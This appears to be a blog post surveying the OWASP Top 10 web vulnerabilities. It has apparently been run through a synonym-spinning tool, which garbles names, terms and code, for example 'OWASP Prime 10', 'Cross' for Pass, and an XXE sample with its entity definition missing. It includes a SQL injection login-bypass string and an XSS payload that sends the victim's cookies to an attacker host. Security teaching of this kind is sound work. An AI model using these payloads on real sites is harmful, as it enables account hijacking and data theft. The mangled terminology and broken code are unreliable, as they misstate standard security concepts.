Actual-World Examples for OWASP Prime 10 Vulnerabilities thumbnail

The OWASP (Open Net Utility Safety Mission) Prime 10 is an ordinary safety guideline adopted by builders and safety professionals throughout the business. The OWASP is a non-profit group began in 2004 to assist safe functions in opposition to well-liked vulnerabilities.

As software program growth practices have advanced through the years, so have the character of assaults. To remain related as per present day complicated safety vulnerabilities, OWASP retains updating its vulnerabilities listing based mostly on the present developments (OWASP is presently in its 2017 version).

Having understood what OWASP Prime 10 normal is, let’s take a look at every one in all them with a real-world instance to assist our understanding.

1. Injection

SQL injections happen when a user-controlled enter is appended to the SQL assertion dynamically with out enter validation. On this case, the attacker might present malicious enter and alter the SQL assertion conduct to hold out their malicious actions. The attacker can use this to extract delicate knowledge, delete knowledge, and many others. Beneath are examples of susceptible and non-vulnerable code snippets.

Weak code:

uName = getRequestString(“username”);

uPass = getRequestString(“userpassword”);

sql = ‘SELECT * FROM Customers WHERE Title =”‘ uName ‘” AND Cross =”‘ uPass ‘”‘

Right here uName and uPass are user-controlled. If an attacker submits uName as “admin” and password as ” OR 1 = 1 — then the SQL assertion will turn into one thing like

sql = ‘SELECT * FROM Customers WHERE Title =”admin” AND Cross =”” OR 1 = 1 —

This may make the assertion true and can fetch data for admin customers. Utilizing ready statements stays the most well-liked and efficient solution to remediate this difficulty, as proven under.

Mounted code:

String Uname = //person enter

String Upass = //person enter

Connection connection = DriverManager.getConnection(…);

PreparedStatement assertion = connection.prepareStatement(

“SELECT * FROM Customers WHERE Title = ? AND Cross = ?” );

assertion.setString(1, Uname);

assertion.setString(2, Cross);

ResultSet rs = assertion.executeQuery();

2. Damaged Authentication

Weak or lacking authentication can enable attackers to compromise password and session tokens and in the end acquire entry into the sufferer’s account. Subsequently, functions ought to use complicated and safe random passwords and session tokens such that they will’t be guessed simply. 

Other than that, there ought to be safety controls comparable to an account lockout coverage and password expiry coverage to forestall functions from falling prey to automated brute power assaults.

3. Delicate Knowledge Publicity

Knowledge publicity can occur primarily in two methods. First, at relaxation—when the info is saved within the system (file or database), it ought to be encrypted utilizing a powerful encryption mechanism. If this isn’t carried out and the storage service is compromised, saved knowledge might get leaked. 

Second, in transit—knowledge ought to be correctly encrypted when despatched throughout community channels. Thus, whether it is intercepted in between, the integrity of the delicate knowledge stays unchanged. That is referred to as knowledge safety at transit.

Word: Password fields ought to be hashed after which saved within the database. The explanation for that is that hashing is a one-way mechanism. Thus, even when the database is compromised, the attacker won’t be able to retrieve the password worth from the password hash.

4. XML Exterior Entities (XXE)

Fairly just a few functions use XML paperwork to allow the communication of knowledge between the server and browser. Subsequently, they want XML parsers to parse the knowledge. When a poorly configured XML parser is used to parse a malicious enter XML doc, it could consider the exterior entity references executing the attacker’s instructions. Beneath is an instance of a malicious enter XML doc.

xml model=“1.0” encoding=“ISO-8859-1”?>



 

  ]>

<foo>&xxe;foo>

Within the above snippet, there’s a system command to learn the native “passwd” file on the server. In sure instances, this vulnerability might propagate into different assaults like SSRF (server-side request forgery), native file inclusion, distant code execution, DoS assault, and many others.

As remediation, it’s instructed to disable decision of exterior entities and disable help for XInclude. 

5. Damaged Entry Management 

Entry management refers back to the restriction enforced on chosen sources to offer entry to solely supposed customers. An utility that doesn’t implement correct entry management might enable an attacker to entry unauthorized functionalities or knowledge. Beneath is a real-life instance of a  susceptible system that used person enter with out validation.

System #1: The applying makes use of unvalidated knowledge in a SQL assertion that’s accessing account info from database:

pstmt.setString(1, request.getParameter(“acctNo”));

ResultSet outcomes = pstmt.executeQuery( );

An attacker merely modifies the ‘acctNo’ parameter in the browser to ship no matter account quantity they need and efficiently accesses any person‘s account.

Service name : http://instance.com/app/accountInfo?acct=1234

6. Safety Misconfiguration

That is the most well-liked safety vulnerability throughout many functions/programs. As builders use a variety of built-in instruments and companies throughout utility growth, they have an inclination to make use of the default setting supplied, which is harmful and leaves your utility susceptible. 

Underneath regular circumstances, utility configurations allow detailed error messages. So when an error happens, like debug logging, stack traces, and many others., the browser provides the whole particulars to the person. Sadly, this exposes delicate info comparable to element variations which is usually a downside if the element has recognized vulnerabilities that you haven’t mounted but.

7. Cross-Web site Scripting XSS:  

In cross-site scripting (XSS), attacker-controlled person enter is added to the online web page with out validation or correct escaping. Then the attacker might introduce malicious code to execute their Javascript on the sufferer’s browser. This can be utilized to redirect the sufferer to an attacker-controlled web page, change UI components of the web page to deface it, or steal cookie particulars. Beneath is an instance of a javascript payload that steals cookies and sends them to the attacker server.

<script kind=“textual content/javascript”>doc.location=“http://192.168.0.48:5000/?c=” doc.cookie;script>

8. Insecure Deserialization: 

The insecure deserialization vulnerability arises when an utility deserializes user-provided serialized enter with out implementing safety controls. Few well-liked deserializers comparable to Python’s Pickle Module and Java’s ReadObject methodology are recognized to be susceptible to deserialization assaults. Utilizing this, an attacker can carry out distant code execution on the server leading to securing distant entry. 

9. Utilizing Elements with Identified Vulnerabilities

As we speak, utilizing free/open supply softwares and third-party libraries is a quite common apply in utility growth. Subsequently, it’s equally essential to make sure the safety of those open supply and third-party elements used within the growth. This apply of managing open supply and third-party software program safety and licensing is also referred to as software program composition evaluation

10. Inadequate Logging & Monitoring

To stop a cyber assault and act in case of 1, logging and monitoring programs are essentially the most essential hyperlink within the safety occasion administration chain. They assist detect and analyze the basis reason for the assault. Incident monitoring options like Splunk, CyberArk assist analyze endpoint logs and report malicious conduct within the type of alarms. To behave on these alarms, incident response options like Resilient, ForcePoint, and Crowdstike can be utilized. They execute a set of predefined actions to assist deal with safety threats.

Conclusion

Utility builders and safety engineers ought to check their codebases in opposition to well-liked net vulnerabilities earlier than publishing their functions in a manufacturing surroundings. This OWASP Prime 10 listing of net vulnerabilities can be utilized as a guidelines in safety testing. 

Thanks all for going by the OWASP Prime 10 with me. I hope you loved studying.  

By Admin

Leave a Reply

Your email address will not be published. Required fields are marked *